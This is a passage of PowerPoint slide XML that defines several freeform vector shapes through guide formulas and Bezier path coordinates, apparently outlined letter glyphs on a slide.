              <p:custDataLst>
                <p:tags r:id="rId98"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1108076" y="2317751"/>
              <a:ext cx="47625" cy="50800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 46 w 135"/>
                <a:gd name="T1" fmla="*/ 27 h 147"/>
                <a:gd name="T2" fmla="*/ 24 w 135"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 1 w 135"/>
                <a:gd name="T5" fmla="*/ 27 h 147"/>
                <a:gd name="T6" fmla="*/ 8 w 135"/>
                <a:gd name="T7" fmla="*/ 129 h 147"/>
                <a:gd name="T8" fmla="*/ 24 w 135"/>
                <a:gd name="T9" fmla="*/ 147 h 147"/>
                <a:gd name="T10" fmla="*/ 39 w 135"/>
                <a:gd name="T11" fmla="*/ 129 h 147"/>
                <a:gd name="T12" fmla="*/ 46 w 135"/>
                <a:gd name="T13" fmla="*/ 27 h 147"/>
                <a:gd name="T14" fmla="*/ 134 w 135"/>
                <a:gd name="T15" fmla="*/ 27 h 147"/>
                <a:gd name="T16" fmla="*/ 112 w 135"/>
                <a:gd name="T17" fmla="*/ 0 h 147"/>
                <a:gd name="T18" fmla="*/ 89 w 135"/>
                <a:gd name="T19" fmla="*/ 27 h 147"/>
                <a:gd name="T20" fmla="*/ 96 w 135"/>
                <a:gd name="T21" fmla="*/ 129 h 147"/>
                <a:gd name="T22" fmla="*/ 112 w 135"/>
                <a:gd name="T23" fmla="*/ 147 h 147"/>
                <a:gd name="T24" fmla="*/ 127 w 135"/>
                <a:gd name="T25" fmla="*/ 129 h 147"/>
                <a:gd name="T26" fmla="*/ 134 w 135"/>
                <a:gd name="T27" fmla="*/ 2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147">
                  <a:moveTo>
                    <a:pt x="46" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="4"/>
                    <a:pt x="30" y="0"/>
                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="1" y="27"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="136"/>
                    <a:pt x="10" y="147"/>
                    <a:pt x="24" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="147"/>
                    <a:pt x="39" y="138"/>
                    <a:pt x="39" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46" y="27"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="134" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="4"/>
                    <a:pt x="118" y="0"/>
                    <a:pt x="112" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="0"/>
                    <a:pt x="88" y="6"/>
                    <a:pt x="89" y="27"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="136"/>
                    <a:pt x="98" y="147"/>
                    <a:pt x="112" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="147"/>
                    <a:pt x="127" y="138"/>
                    <a:pt x="127" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="134" y="2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82" name="Freeform 923">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA676EFB-0AAD-4067-BAF9-9A857AEE223E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId99"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1189038" y="2349501"/>
              <a:ext cx="66675" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 113 w 193"/>
                <a:gd name="T1" fmla="*/ 92 h 222"/>
                <a:gd name="T2" fmla="*/ 79 w 193"/>
                <a:gd name="T3" fmla="*/ 86 h 222"/>
                <a:gd name="T4" fmla="*/ 31 w 193"/>
                <a:gd name="T5" fmla="*/ 59 h 222"/>
                <a:gd name="T6" fmla="*/ 94 w 193"/>
                <a:gd name="T7" fmla="*/ 30 h 222"/>
                <a:gd name="T8" fmla="*/ 144 w 193"/>
                <a:gd name="T9" fmla="*/ 58 h 222"/>
                <a:gd name="T10" fmla="*/ 161 w 193"/>
                <a:gd name="T11" fmla="*/ 75 h 222"/>
                <a:gd name="T12" fmla="*/ 178 w 193"/>
                <a:gd name="T13" fmla="*/ 55 h 222"/>
                <a:gd name="T14" fmla="*/ 178 w 193"/>
                <a:gd name="T15" fmla="*/ 20 h 222"/>
                <a:gd name="T16" fmla="*/ 163 w 193"/>
                <a:gd name="T17" fmla="*/ 0 h 222"/>
                <a:gd name="T18" fmla="*/ 148 w 193"/>
                <a:gd name="T19" fmla="*/ 10 h 222"/>
                <a:gd name="T20" fmla="*/ 95 w 193"/>
                <a:gd name="T21" fmla="*/ 0 h 222"/>
                <a:gd name="T22" fmla="*/ 0 w 193"/>
                <a:gd name="T23" fmla="*/ 59 h 222"/>
                <a:gd name="T24" fmla="*/ 99 w 193"/>
                <a:gd name="T25" fmla="*/ 120 h 222"/>
                <a:gd name="T26" fmla="*/ 163 w 193"/>
                <a:gd name="T27" fmla="*/ 157 h 222"/>
                <a:gd name="T28" fmla="*/ 99 w 193"/>
                <a:gd name="T29" fmla="*/ 192 h 222"/>
                <a:gd name="T30" fmla="*/ 35 w 193"/>
                <a:gd name="T31" fmla="*/ 147 h 222"/>
                <a:gd name="T32" fmla="*/ 18 w 193"/>
                <a:gd name="T33" fmla="*/ 133 h 222"/>
                <a:gd name="T34" fmla="*/ 0 w 193"/>
                <a:gd name="T35" fmla="*/ 153 h 222"/>
                <a:gd name="T36" fmla="*/ 0 w 193"/>
                <a:gd name="T37" fmla="*/ 202 h 222"/>
                <a:gd name="T38" fmla="*/ 15 w 193"/>
                <a:gd name="T39" fmla="*/ 222 h 222"/>
                <a:gd name="T40" fmla="*/ 34 w 193"/>
                <a:gd name="T41" fmla="*/ 203 h 222"/>
                <a:gd name="T42" fmla="*/ 99 w 193"/>
                <a:gd name="T43" fmla="*/ 222 h 222"/>
                <a:gd name="T44" fmla="*/ 193 w 193"/>
                <a:gd name="T45" fmla="*/ 157 h 222"/>
                <a:gd name="T46" fmla="*/ 113 w 193"/>
                <a:gd name="T47" fmla="*/ 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2">
                  <a:moveTo>
                    <a:pt x="113" y="92"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="90"/>
                    <a:pt x="92" y="89"/>
                    <a:pt x="79" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="84"/>
                    <a:pt x="31" y="78"/>
                    <a:pt x="31" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="46"/>
                    <a:pt x="47" y="30"/>
                    <a:pt x="94" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="30"/>
                    <a:pt x="142" y="45"/>
                    <a:pt x="144" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="67"/>
                    <a:pt x="145" y="75"/>
                    <a:pt x="161" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="75"/>
                    <a:pt x="178" y="65"/>
                    <a:pt x="178" y="55"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="178" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="12"/>
                    <a:pt x="178" y="0"/>
                    <a:pt x="163" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="149" y="7"/>
                    <a:pt x="148" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="0"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="95" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="105"/>
                    <a:pt x="53" y="113"/>
                    <a:pt x="99" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="124"/>
                    <a:pt x="163" y="130"/>
                    <a:pt x="163" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="175"/>
                    <a:pt x="144" y="192"/>
                    <a:pt x="99" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="192"/>
                    <a:pt x="48" y="186"/>
                    <a:pt x="35" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="138"/>
                    <a:pt x="31" y="133"/>
                    <a:pt x="18" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="133"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="153"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210"/>
                    <a:pt x="0" y="222"/>
                    <a:pt x="15" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="222"/>
                    <a:pt x="28" y="222"/>
                    <a:pt x="34" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="221"/>
                    <a:pt x="85" y="222"/>
                    <a:pt x="99" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="222"/>
                    <a:pt x="193" y="181"/>
                    <a:pt x="193" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="105"/>
                    <a:pt x="129" y="95"/>
                    <a:pt x="113" y="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83" name="Freeform 924">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3945F0C-5B04-40FC-B168-74AF817CEC68}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId100"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1276351" y="2349501"/>
              <a:ext cx="69850" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 108 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 115 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 187 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 36 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 108 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 169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5" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="108" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="51" y="222"/>
                    <a:pt x="115" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="222"/>
                    <a:pt x="204" y="177"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="190" y="151"/>
                    <a:pt x="187" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="151"/>
                    <a:pt x="174" y="152"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="187"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="44" y="167"/>
                    <a:pt x="36" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="73" y="30"/>
                    <a:pt x="108" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="169"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84" name="Freeform 925">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DADD893E-2BF9-44AF-AE4D-B23346454F31}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId101"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1370013" y="2349501"/>
              <a:ext cx="66675" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 113 w 193"/>
                <a:gd name="T1" fmla="*/ 92 h 222"/>
                <a:gd name="T2" fmla="*/ 79 w 193"/>
                <a:gd name="T3" fmla="*/ 86 h 222"/>
                <a:gd name="T4" fmla="*/ 31 w 193"/>
                <a:gd name="T5" fmla="*/ 59 h 222"/>
                <a:gd name="T6" fmla="*/ 94 w 193"/>
                <a:gd name="T7" fmla="*/ 30 h 222"/>
                <a:gd name="T8" fmla="*/ 144 w 193"/>
                <a:gd name="T9" fmla="*/ 58 h 222"/>
                <a:gd name="T10" fmla="*/ 161 w 193"/>
                <a:gd name="T11" fmla="*/ 75 h 222"/>
                <a:gd name="T12" fmla="*/ 178 w 193"/>
                <a:gd name="T13" fmla="*/ 55 h 222"/>
                <a:gd name="T14" fmla="*/ 178 w 193"/>
                <a:gd name="T15" fmla="*/ 20 h 222"/>
                <a:gd name="T16" fmla="*/ 163 w 193"/>
                <a:gd name="T17" fmla="*/ 0 h 222"/>
                <a:gd name="T18" fmla="*/ 148 w 193"/>
                <a:gd name="T19" fmla="*/ 10 h 222"/>
                <a:gd name="T20" fmla="*/ 95 w 193"/>
                <a:gd name="T21" fmla="*/ 0 h 222"/>
                <a:gd name="T22" fmla="*/ 0 w 193"/>
                <a:gd name="T23" fmla="*/ 59 h 222"/>
                <a:gd name="T24" fmla="*/ 99 w 193"/>
                <a:gd name="T25" fmla="*/ 120 h 222"/>
                <a:gd name="T26" fmla="*/ 163 w 193"/>
                <a:gd name="T27" fmla="*/ 157 h 222"/>
                <a:gd name="T28" fmla="*/ 99 w 193"/>
                <a:gd name="T29" fmla="*/ 192 h 222"/>
                <a:gd name="T30" fmla="*/ 35 w 193"/>
                <a:gd name="T31" fmla="*/ 147 h 222"/>
                <a:gd name="T32" fmla="*/ 18 w 193"/>
                <a:gd name="T33" fmla="*/ 133 h 222"/>
                <a:gd name="T34" fmla="*/ 0 w 193"/>
                <a:gd name="T35" fmla="*/ 153 h 222"/>
                <a:gd name="T36" fmla="*/ 0 w 193"/>
                <a:gd name="T37" fmla="*/ 202 h 222"/>
                <a:gd name="T38" fmla="*/ 15 w 193"/>
                <a:gd name="T39" fmla="*/ 222 h 222"/>
                <a:gd name="T40" fmla="*/ 34 w 193"/>
                <a:gd name="T41" fmla="*/ 203 h 222"/>
                <a:gd name="T42" fmla="*/ 99 w 193"/>
                <a:gd name="T43" fmla="*/ 222 h 222"/>
                <a:gd name="T44" fmla="*/ 193 w 193"/>
                <a:gd name="T45" fmla="*/ 157 h 222"/>
                <a:gd name="T46" fmla="*/ 113 w 193"/>
                <a:gd name="T47" fmla="*/ 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2">
                  <a:moveTo>
                    <a:pt x="113" y="92"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="90"/>
                    <a:pt x="92" y="89"/>
                    <a:pt x="79" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="84"/>
                    <a:pt x="31" y="78"/>
                    <a:pt x="31" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="46"/>
                    <a:pt x="47" y="30"/>
                    <a:pt x="94" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="30"/>
                    <a:pt x="142" y="45"/>
                    <a:pt x="144" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="67"/>
                    <a:pt x="145" y="75"/>
                    <a:pt x="161" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="75"/>
                    <a:pt x="178" y="65"/>
                    <a:pt x="178" y="55"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="178" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="12"/>
                    <a:pt x="178" y="0"/>
                    <a:pt x="163" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="149" y="7"/>
                    <a:pt x="148" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="0"/>
                    <a:pt x="105" y="0"/>
                    <a:pt x="95" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="105"/>
                    <a:pt x="53" y="113"/>
                    <a:pt x="99" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="124"/>
                    <a:pt x="163" y="130"/>
                    <a:pt x="163" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="175"/>
                    <a:pt x="144" y="192"/>
                    <a:pt x="99" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="192"/>
                    <a:pt x="48" y="186"/>
                    <a:pt x="35" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="138"/>
                    <a:pt x="31" y="133"/>
                    <a:pt x="18" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="133"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="153"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210"/>
                    <a:pt x="0" y="222"/>
                    <a:pt x="15" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="222"/>
                    <a:pt x="28" y="222"/>
                    <a:pt x="34" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="221"/>
                    <a:pt x="85" y="222"/>
                    <a:pt x="99" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="222"/>
                    <a:pt x="193" y="181"/>
                    <a:pt x="193" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="105"/>
                    <a:pt x="129" y="95"/>
                    <a:pt x="113" y="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85" name="Freeform 926">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD46E77C-C4CE-4262-B964-A7E2CF96E56F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId102"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1460501" y="2349501"/>
              <a:ext cx="66675" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 113 w 193"/>
                <a:gd name="T1" fmla="*/ 92 h 222"/>
                <a:gd name="T2" fmla="*/ 79 w 193"/>
                <a:gd name="T3" fmla="*/ 86 h 222"/>
                <a:gd name="T4" fmla="*/ 30 w 193"/>
                <a:gd name="T5" fmla="*/ 59 h 222"/>
                <a:gd name="T6" fmla="*/ 94 w 193"/>
                <a:gd name="T7" fmla="*/ 30 h 222"/>
                <a:gd name="T8" fmla="*/ 143 w 193"/>
                <a:gd name="T9" fmla="*/ 58 h 222"/>
                <a:gd name="T10" fmla="*/ 160 w 193"/>
                <a:gd name="T11" fmla="*/ 75 h 222"/>
                <a:gd name="T12" fmla="*/ 178 w 193"/>
                <a:gd name="T13" fmla="*/ 55 h 222"/>
                <a:gd name="T14" fmla="*/ 178 w 193"/>
                <a:gd name="T15" fmla="*/ 20 h 222"/>
                <a:gd name="T16" fmla="*/ 163 w 193"/>
                <a:gd name="T17" fmla="*/ 0 h 222"/>
                <a:gd name="T18" fmla="*/ 148 w 193"/>
                <a:gd name="T19" fmla="*/ 10 h 222"/>
                <a:gd name="T20" fmla="*/ 95 w 193"/>
                <a:gd name="T21" fmla="*/ 0 h 222"/>
                <a:gd name="T22" fmla="*/ 0 w 193"/>
                <a:gd name="T23" fmla="*/ 59 h 222"/>
                <a:gd name="T24" fmla="*/ 98 w 193"/>
                <a:gd name="T25" fmla="*/ 120 h 222"/>
                <a:gd name="T26" fmla="*/ 162 w 193"/>
                <a:gd name="T27" fmla="*/ 157 h 222"/>
                <a:gd name="T28" fmla="*/ 99 w 193"/>
                <a:gd name="T29" fmla="*/ 192 h 222"/>
                <a:gd name="T30" fmla="*/ 35 w 193"/>
                <a:gd name="T31" fmla="*/ 147 h 222"/>
                <a:gd name="T32" fmla="*/ 17 w 193"/>
                <a:gd name="T33" fmla="*/ 133 h 222"/>
                <a:gd name="T34" fmla="*/ 0 w 193"/>
                <a:gd name="T35" fmla="*/ 153 h 222"/>
                <a:gd name="T36" fmla="*/ 0 w 193"/>
                <a:gd name="T37" fmla="*/ 202 h 222"/>
                <a:gd name="T38" fmla="*/ 15 w 193"/>
                <a:gd name="T39" fmla="*/ 222 h 222"/>
                <a:gd name="T40" fmla="*/ 33 w 193"/>
                <a:gd name="T41" fmla="*/ 203 h 222"/>
                <a:gd name="T42" fmla="*/ 98 w 193"/>
                <a:gd name="T43" fmla="*/ 222 h 222"/>
                <a:gd name="T44" fmla="*/ 193 w 193"/>
                <a:gd name="T45" fmla="*/ 157 h 222"/>
                <a:gd name="T46" fmla="*/ 113 w 193"/>
                <a:gd name="T47" fmla="*/ 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2">
                  <a:moveTo>
                    <a:pt x="113" y="92"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="90"/>
                    <a:pt x="91" y="89"/>
                    <a:pt x="79" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="84"/>
                    <a:pt x="30" y="78"/>
                    <a:pt x="30" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="46"/>
                    <a:pt x="46" y="30"/>
                    <a:pt x="94" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="30"/>
                    <a:pt x="142" y="45"/>
                    <a:pt x="143" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="67"/>
                    <a:pt x="145" y="75"/>
                    <a:pt x="160" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="75"/>
                    <a:pt x="178" y="65"/>
                    <a:pt x="178" y="55"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="178" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="12"/>
                    <a:pt x="178" y="0"/>
                    <a:pt x="163" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="149" y="7"/>
                    <a:pt x="148" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="0"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="95" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="0"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="105"/>
                    <a:pt x="52" y="113"/>
                    <a:pt x="98" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="124"/>
                    <a:pt x="162" y="130"/>
                    <a:pt x="162" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="175"/>
                    <a:pt x="144" y="192"/>
                    <a:pt x="99" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="192"/>
                    <a:pt x="47" y="186"/>
                    <a:pt x="35" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="138"/>
                    <a:pt x="30" y="133"/>
                    <a:pt x="17" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="133"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="153"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210"/>
                    <a:pt x="0" y="222"/>
                    <a:pt x="15" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="222"/>
                    <a:pt x="27" y="222"/>
                    <a:pt x="33" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="221"/>
                    <a:pt x="84" y="222"/>
                    <a:pt x="98" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="222"/>
                    <a:pt x="193" y="181"/>
                    <a:pt x="193" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="105"/>
                    <a:pt x="128" y="95"/>
                    <a:pt x="113" y="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86" name="Freeform 927">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF48F143-DB92-42A0-8C1B-68427C92391E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId103"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1550988" y="2319338"/>
              <a:ext cx="65088" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 188"/>
